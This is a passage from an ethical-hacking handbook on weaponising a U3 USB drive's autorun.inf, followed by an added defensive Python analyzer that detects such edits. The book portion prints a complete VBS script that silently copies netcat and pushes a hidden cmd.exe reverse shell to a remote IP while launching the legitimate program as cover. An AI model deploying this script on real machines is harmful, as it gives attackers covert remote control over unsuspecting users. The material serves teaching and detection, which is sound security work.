Gray Hat Hacking, The Ethical Hacker’s Handbook, Third Edition
Extracting the default autorun.inf file is simple, and the file contains only a few directives.
In this example, we will replace the executable call with a script of our own. Our script
will perform an attack using netcat to push a command shell to a remote computer,
and then execute the originally specified program, LaunchU3.exe, so that the user won't
notice any abnormal behavior when they plug in the USB drive. The unedited autorun.inf
file is as follows:
[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG
[Comment]
brand=PelicanBFG
For our purposes, we’ll only edit the second line of this file and change it from
open=wscript LaunchU3.exe -a
to
open=wscript cruzer/go.vbs
When the autorun.inf file is executed on insertion of the device, our go.vbs script
will run instead of the LaunchU3.exe application. We'll put it in a directory called cruzer
along with the netcat binary nc.exe, in an attempt to make it slightly less noticeable
at a casual glance. Next, we need to create our go.vbs script. Since we're just demonstrating
the technique, we'll keep it very simple, as shown next. The script will copy the
netcat binary to the Windows temp directory and then execute the netcat command
with options to bind a cmd.exe command shell and pass it to a remote computer.
'This prevents the script from throwing errors in the event it has trouble
On Error Resume Next
set objShell = WScript.CreateObject("WScript.Shell")
'Get the location of the temp directory
temp=objShell.ExpandEnvironmentStrings("%temp%")
'Get the location of the Windows Directory
windir=objShell.ExpandEnvironmentStrings("%windir%")
set filesys=CreateObject("Scripting.FileSystemObject")
'Copy our netcat into the temp directory of the target
filesys.CopyFile "cruzer\nc.exe", temp & "\"
'Wait to make sure the operation completes
WScript.Sleep 5000
'Throw a command prompt to the waiting remote computer, a local test in this case.
'The 0 at the end of the line specifies that the command box NOT be displayed to
'the user.
objShell.Run temp & "\nc.exe -e " & windir & "\system32\cmd.exe 192.168.1.106 443",0
'Execute the application originally specified in the autorun.inf file
objShell.Run "LaunchU3.exe -a"
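The autorun.inf substitution above (the vendor's open=wscript LaunchU3.exe -a swapped for open=wscript cruzer/go.vbs) is exactly the change a defender inspecting removable media wants to catch. The following Python analyzer is an added example, not code from the book: it parses the two autorun.inf variants reproduced on this page, flags an open= or shellexecute= directive whose launched file is a script, lives in a subdirectory, or does not match the icon= executable, and diffs a candidate file against a known-good baseline. The heuristics, the SCRIPT_HOSTS/SCRIPT_EXTS lists and the function names are the editor's own assumptions; the modified sample is built from the vendor file by applying the one-line change the text describes.

```python
"""Defensive autorun.inf analyzer (added example, not from the book).

Flags the kind of substitution shown in the text: a vendor autorun.inf whose
open= line is replaced so that a script in a subdirectory runs instead of the
advertised executable.  Heuristics below are assumptions, not a standard.
"""
import configparser
import ntpath
import shlex

# Assumed lists: script hosts that take a script as first argument, and
# extensions that indicate a script rather than a compiled executable.
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}

# Vendor autorun.inf exactly as reproduced on the page.
VENDOR_AUTORUN = """[AutoRun]
open=wscript LaunchU3.exe -a
icon=LaunchU3.exe,0
action=Run U3 Launchpad
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=http://u3.sandisk.com/download/lp_installer.asp?custom=1.6.1.2&brand=PelicanBFG
[Comment]
brand=PelicanBFG
"""

# The modified file described in the text: only the open= line changes.
MODIFIED_AUTORUN = VENDOR_AUTORUN.replace(
    "open=wscript LaunchU3.exe -a", "open=wscript cruzer/go.vbs")


def parse_autorun(text):
    """Parse INI-style autorun.inf into {section: {key: value}} (names lowercased)."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str.lower
    cp.read_string(text)
    return {section.lower(): dict(cp.items(section)) for section in cp.sections()}


def launched_target(command):
    """Return the file that actually runs: the script host's first argument
    when a host such as wscript is used, otherwise the first token."""
    tokens = [t.strip('"') for t in shlex.split(command, posix=False)]
    if not tokens:
        return None
    if ntpath.basename(tokens[0]).lower() in SCRIPT_HOSTS and len(tokens) > 1:
        return tokens[1]
    return tokens[0]


def analyze(text):
    """Return a list of human-readable findings for the [AutoRun] section."""
    autorun = parse_autorun(text).get("autorun", {})
    icon_exe = autorun.get("icon", "").split(",")[0].strip()
    findings = []
    for key in ("open", "shellexecute"):
        command = autorun.get(key)
        if not command:
            continue
        target = launched_target(command)
        normalized = target.replace("/", "\\")
        name = ntpath.basename(normalized)
        ext = ntpath.splitext(name)[1].lower()
        if ext in SCRIPT_EXTS:
            findings.append(f"{key}: launches a script file ({target})")
        if "\\" in normalized:
            findings.append(f"{key}: launched file is outside the drive root ({target})")
        if icon_exe and name.lower() != icon_exe.lower():
            findings.append(f"{key}: launched file {name} differs from icon source {icon_exe}")
    return findings


def changed_directives(baseline, candidate):
    """Diff two autorun.inf texts; returns {'section.key': (old, new)}."""
    base, cand = parse_autorun(baseline), parse_autorun(candidate)
    changes = {}
    for section in sorted(set(base) | set(cand)):
        for key in sorted(set(base.get(section, {})) | set(cand.get(section, {}))):
            old = base.get(section, {}).get(key)
            new = cand.get(section, {}).get(key)
            if old != new:
                changes[f"{section}.{key}"] = (old, new)
    return changes


if __name__ == "__main__":
    print("vendor findings:  ", analyze(VENDOR_AUTORUN))
    print("modified findings:", analyze(MODIFIED_AUTORUN))
    print("changed keys:     ", changed_directives(VENDOR_AUTORUN, MODIFIED_AUTORUN))
```

The baseline diff is the more robust of the two checks: vendor launchers legitimately vary, but a drive whose autorun.inf differs from the image the vendor ships is worth a closer look regardless of what the new command is. Note also that the check matters most on older systems and on U3-style devices: since Windows 7 (and the corresponding update for earlier versions), Windows no longer honors autorun.inf on USB mass-storage volumes, only on optical media, which is why a device that presents itself as a CD-ROM is the interesting case.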